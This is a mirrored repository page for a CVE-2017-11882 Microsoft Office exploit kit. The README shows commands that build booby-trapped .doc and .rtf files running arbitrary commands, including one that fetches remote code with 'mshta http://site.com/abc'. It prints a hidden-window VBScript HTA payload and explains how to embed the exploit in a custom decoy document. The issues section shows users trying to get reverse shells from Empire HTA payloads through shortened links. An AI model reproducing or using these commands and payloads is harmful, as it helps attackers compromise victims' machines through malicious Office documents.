Giter Site home page Giter Site logo

cve-2017-11882's Introduction

CVE-2017-11882

43b 原脚本来自于 https://github.com/embedi/CVE-2017-11882

109b 原脚本来自于 https://github.com/unamer/CVE-2017-11882/ (膜一波,现在unamer的代码已经可以执行shellcode了~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Usage

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

use mshta

python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>

43b命令长度不能超过43 bytes,109b命令长度不能超过109 bytes

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

关于自定义内容

其实关于自定义内容的姿势也是跟别的师傅学来的,很早之前就已经写成脚本了,本来不打算公开,但是看到小组内已经有人发出来了,没办法,只能公开了,其实方式很简单,只需要文本文件打开正常的文档rtf,复制{*\datastore 之前的所有内容,替换 {\object\objautlink\objupdate之前的内容即可,所以写到脚本里面就很简单了。

添加自定义内容使用方式,选择任意脚本:

python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

自定义内容在input.rtf中。

关于unamer的最新的605字节利用脚本就不更新了,有兴趣自己改。

cve-2017-11882's People

Contributors

ridter avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

drops0hong q1ngshan zzhacked fzxcp3 lucifaer thanatoskira tears2015 tom4t0 yeyintminthuhtut mabangde lovesuae jymcheong jerusalemsbell xunnun luke-lv quikilr k3v1n1990s 0ahu qinalei redwifiteam forlin cybermonitor 4chr4f hucheat jooeji gloxec moxwose wpaladins lins andyvaikunth orf53975 liyic wilsonleeee bunseokbot e7mer bokdong2 mel0day c0met adeljck lxkxc aquila008 pentestingxroot lovebair2022 n0ooooone salahgeek firefalc0n m31n99 firstblue githusky sec-db backtrackcroot heascle webvul lw1988 tyekrgk minkione whitesharks cybertroyeu long80a wooyun123 hoangcuongflp avgirl johnhubcr missdiog nice-jj kyhvedn morallo cyri1s mother2110 sqqihao python2014 t3st0r-git aminecherrai mvillalon axiao111 log4she11 linll samyoyo idkwim ioanlongjing chingru subc0ol viscript biitt jjf012 beyondcy 957204459 maxati9600 baisys wdsjxh gaojianli zenosxx lllrrr hzhikui kbahaxor chouaibhm adeptex dragoneeg secwsstest swk180

cve-2017-11882's Issues

no connection after open word doc ?

linux 2017.2
empire hta
machine where i open word doc is windows 7..
have ports open and no firewall block.

i put this in command and nothing happens when open word doc and receive also message
"item not supported "

python Command43b_CVE-2017-11882.py -c "mshta https://goo.gl/46hV9Q" -o test3.doc
[*] Done ! output file --> test3.doc

i can see what i do wrong ?

Syntax Error

I have used this same command and it works, just checking today and it fails giving me this error below

SyntaxError: Missing parentheses in call to 'print'. Did you mean print(print "[!] Primitive command must be shorter than 109 bytes")?

No trigger

Seems fine but nothing executes, what could it be ?
No anti virus is enabled^^

someone can help me with this issue.

i want to know where is it my fault?. in the first situation exploit can run good.
2017-12-03_215601

but using mshta command it doest work fine.
mshta1

what can i do? if you see calculator is not open

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.